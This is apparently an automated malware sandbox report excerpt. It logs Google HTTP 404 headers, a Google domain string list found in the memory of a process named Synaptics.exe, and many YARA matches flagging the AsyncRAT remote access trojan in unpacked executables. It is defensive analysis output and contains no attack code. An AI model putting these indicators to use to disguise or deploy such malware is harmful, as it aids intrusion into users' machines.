            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-MnbeCR+DLosHit1O26Q8ng' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=Z9NzJjnPWUitQLAoJHeuMMuo7U2KlbjEgRTwO6DBDzKkE9bNbTk7QrgaCNMw7qYQFNh3y6NAHppTjvVahiaNwwztWY1HVVfW-N_CaP8ut_6I2UiEdontaeBHy3IXTvLOy8WJyEVXH-OcRIRxCituWMrRoGdSseIThKXC76zDRX8; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-YXDM5qvdo8b2sWEK1L9uVw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=ItB4rggOjE7L83nmMdJfyQhAXU45o48wqAdRB-lL5Ie-MdQjOv3okMid3WbfMDZHbnDZr5k9aqXXvSn4CBTAwHSyCdMEU1QFmYWvxj_Bxyqo2--MwRLKKn67BRFBYD59EXcasAatKWIUcsJscCR7xpunrw5_i7il4Vlwvg1bm0Y; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-qUQ/asTtDE7He0Vml9HmZA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=GsvAX0t__-cMfTHedu1r9_YWhq8dTNOVby6k30MueLAVtOkLaQZHzdz00YyNq18rbdjPdyc0Y4iU6Kprz94a8dWdD6HYvujbvGXtTMbrJ3VWJ8_KcKALdwMx3u4pWl4yDWktspyOAhFbeHv2Cp3cvEGHz7ybCheljHi7wIYyQiw; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-RzI2vKOO/RcM9o2uC+wZFw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=oHsspnoaoRPvcVOBycmUhuol6EoOLvfMWKH14ADwtMfMkSbpD4McXBo-NIiw6WK2tPXLjhAxXrYi2j5Wwdpvid_dF8gzqeWxh1UK7pTsTjP_eApiv0c3T4yzPwYAKv1vSBfh3DOcMmuNNBAVV__pNTcD74huBhRy_r2KZ3mXhAA; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-3MXOmncPcJvKr/WLBVs8Mw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=mjLYExoCbbzoBBUNtGENtY1M0qKSlrmcXoYIJs_CCALnZCIBOqRp-6QCq8BTRpdonT8b51hpbQiifNkp-lDolBQYDmXkMflxAtOsGTOCzEEwcE_m_YCznKVQUDPJwzWP67jsK7TbGuvkjGhB4aiIzcwX0QCU0QfLneZL1N-82lk; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Content-Security-Policy: script-src 'nonce-ftrJSB7t2WqD3Wc0doJpzQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=tgTMfZ7NTv3R_IbrSihjBb2kk2KK_CmJAfjV8L7E1gj4Y4KyElEhEF7auzo5NNAF14Er8xmdQUjR1JrqDdruxUCOf144megLwLiTcIrUnMGZ3M5zqxV_TbzDZP_KcKlSmjUpwVMXYOVgPbfDy-mE52xpmx5XYc-gW0fNu7Lj6xE; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Content-Security-Policy: script-src 'nonce-g3DFDAYiVjvuKejFhieIhA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=XWSM1KThS4sUsrpzKBe-UXkKfBYAOV_V-pBG4TKFtlwNETSmBsNYLPwdIwLP0C-cxljhicCjVhOhPmGHGngvqmlM2xSVvWyVCpJQp2pHYXPcOD30RrXp7d7_kmx8iB9z6zkwLZ1gA4C9LvCNMS4ZvE6vwxPFj2YLPWJWrLwBtuU; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-UDhg3Ol/vxNIFYfR64ajjw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=orlJ0NdqZKBuJgdBAEhrpiJB9dinWrdefjKHLXO8dDrwrs2Gl1KvH5O7_-hmsGmBPar5jEJIZpwkTCp2aADXUJ0v22jDK2OpqNdmc3PhtYeUGrfIsg6cJvKc8XJd9d_le0i0QmiTXebU0Dlow0IYxVePmxM_0xdnuzLXfA_AGj0; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-nGVV6uaGbC+cgXeCHrTnSA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=VdtJ7dEWxYuwyj39zjdCItptsaZ6X41Pt1W2YzyShAKVYzCo0n_VAjG3Kn-q7l3N32RNwv0zA2ey7csKpdnOYEPwRG8aljEu-tCTLhtS6O7TKkJJn4tmHfofq494iuEnE3vtL1knh7Pf5mhXt5w5tA2uLL2slaN9xSnjd-w54RM; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-RdHp+ZvfKKgbks87zRU3qw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=myEvXuTvmjxcm4mnQp4ui8yq_pOmgMJXZ4qPt8sg5dP6BwW624u9fHxPm5SLfaDR1bn3DRtOVcQUmhGJb-8EKyJI7IqoDlJu-Yimrlw3LeFe0RflH1gxCzx21qwDBT5nfkHN9MrZplq9LIxFpB6oGRU1iePbOAj1ojcanT9iX_g; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-5xU30urGcRrPcxntL4QFLA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=IZ6IVToh4zcgc4x1sK0NAA7spP8dwoR3XdYssI9Pua_F_DpwrV1d7A2Lplg8ZiHtNOapGJdXunEw6OYhdWwZhh5BxFEnWLJm3lGH0S_UX5kgHKRMYqUNqOgw-QSKsMVLz69xPBGSBWDQ0g4zqPg2fWvSD6Mzlg5dqGcoGip1x00; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-vjtjcs1W4e/lOQ1cPPxnLQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=Vdgur68JofFWxSUhQckp8zV0Ef0ZTFKVUJ8d5I7w3wEVePra58Z4_uxGHewkEDv_U56WgYsIry6fzKCoIDq_XnVime8D9MZwNFwdrBRbEIFbenKPqF_DFmtRfk6NxThU8hv4EwxUkU88wcM1eVL3wKXNvecBnLUZFwUV5PX3e9Q; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-sPLIUksRvialjFnyjQevTQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=WFRHPG-cDuXn9NqSuf0VuWUkAVPh5GdWWBMC9Ru1r6X6fT83oiT3knyYXEyjiVM_qb89t-XLdImlV-942jaLFcvX5D8TlLCmy87ko9TMEaSPrPNdarZ8TaE063oXe5MvEO7vd0XWYuVzSFICtzlQxwzQzt7o0ltS-HOTCTQepZI; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: Synaptics.exe, 00000014.00000000.447541518.00000000079D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleadapis.com*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49765 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
